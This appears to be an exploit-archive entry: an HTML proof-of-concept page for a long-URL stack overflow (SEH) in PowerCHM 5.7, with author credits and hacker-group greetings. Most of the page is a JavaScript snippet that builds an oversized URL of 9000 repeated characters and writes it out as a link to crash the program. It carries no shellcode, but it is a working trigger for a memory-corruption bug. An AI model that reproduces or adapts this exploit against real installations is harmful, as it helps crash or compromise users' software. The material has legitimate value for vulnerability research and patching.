PowerCHM version 5.7 long URL local stack overflow proof of concept exploit.
86af43641627605cc0be92035405b9320a8686d31f85b2d927aebb196187b62e
<html>
<body>
<br>
<font style="font-family:arial;font-size:24px">PowerCHM 5.7 (Long url) Local stack overflow (SEH) POC</font><br>
<font style="font-family:arial;font-size:19px">found By SuB-ZeRo (fbh@hotmail.com) thnaks to hisok4</font><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:12px">Greetz:All friends and muslims HackeRs secdz.com</font><br>
<br>
<script language="JavaScript">
var crash = "http://";
for (i=0;i<9000;i++) crash +="%41";
crash += "/test.rar"
document.write ('<a href="' + crash + '">B00M!</a>');
</script>
</body>
</html>